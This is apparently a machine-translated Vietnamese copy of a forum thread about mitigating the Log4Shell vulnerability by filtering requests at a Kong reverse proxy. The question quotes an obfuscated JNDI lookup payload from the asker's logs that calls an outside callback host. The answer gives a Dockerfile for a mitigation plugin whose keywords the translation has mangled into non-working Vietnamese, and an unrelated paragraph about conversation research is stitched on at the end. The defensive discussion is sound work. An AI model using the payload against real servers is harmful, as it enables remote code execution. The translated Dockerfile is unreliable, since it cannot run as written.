Tham gia Đăng nhập
Điểm:1
avatar Server

Sử dụng proxy ngược kong để lọc khai thác log4j

lá cờ pg
dsteinkopf

tôi đang sử dụng một proxy ngược kong để ủy quyền mọi yêu cầu HTTP cho các máy chủ web của tôi. Tôi muốn giảm thiểu sự cố log4j hiện tại ("log4shell") bằng cách tìm và thay thế các chuỗi của kẻ tấn công quan trọng như "jndi". Ví dụ: tôi tìm thấy đây là nhật ký của mình:

${jndi:${lower:l}${lower:d}a${lower:p}://xxx.log4j.bin${upper:a}xxx.xx:80/callback}

Tôi nghĩ rằng điều này có thể được thực hiện bằng cách sử dụng yêu cầu plugin biến áp. Có ai đã làm điều này chưa?

Tái bút Chỉ cần thay thế jndi qua Vô hiệu hóa là quá sâu rộng và phá vỡ rất nhiều thứ.

585
0 + 0
Điểm:2
avatar Server
lá cờ pg
dsteinkopf

Bản thân những người từ kong gần đây đã gửi một bài viết trên blog đó trả lời câu hỏi của tôi. Họ đã phát triển một bổ sung kong điều đó giảm thiểu việc khai thác.

Tôi đã thêm plugin này vào kong của mình bằng cách thay đổi Dockerfile của mình:

TỪ kong:2.6
...
NGƯỜI DÙNG gốc
...
# giảm thiểu log4shell
# xem https://konghq.com/blog/log4j-log4shell/
CHẠY git clone https://github.com/brentos/kong-plugin-log4shell && \
    cd kong-plugin-log4shell && \
    luarocks làm cho
...
ENV KONG_PLUGINS ...,log4shell
...
USER kong

Sau đó, tôi chỉ cần thêm log4shell này làm plugin toàn cầu.

0 + 0
lá cờ VietNam
Phan Văn Trường
Câu hỏi này là trong các ngôn ngữ khác:

Đăng câu trả lời

Hầu hết mọi người không hiểu rằng việc đặt nhiều câu hỏi sẽ mở ra cơ hội học hỏi và cải thiện mối quan hệ giữa các cá nhân. Ví dụ, trong các nghiên cứu của Alison, mặc dù mọi người có thể nhớ chính xác có bao nhiêu câu hỏi đã được đặt ra trong các cuộc trò chuyện của họ, nhưng họ không trực giác nhận ra mối liên hệ giữa câu hỏi và sự yêu thích. Qua bốn nghiên cứu, trong đó những người tham gia tự tham gia vào các cuộc trò chuyện hoặc đọc bản ghi lại các cuộc trò chuyện của người khác, mọi người có xu hướng không nhận ra rằng việc đặt câu hỏi sẽ ảnh hưởng—hoặc đã ảnh hưởng—mức độ thân thiện giữa những người đối thoại.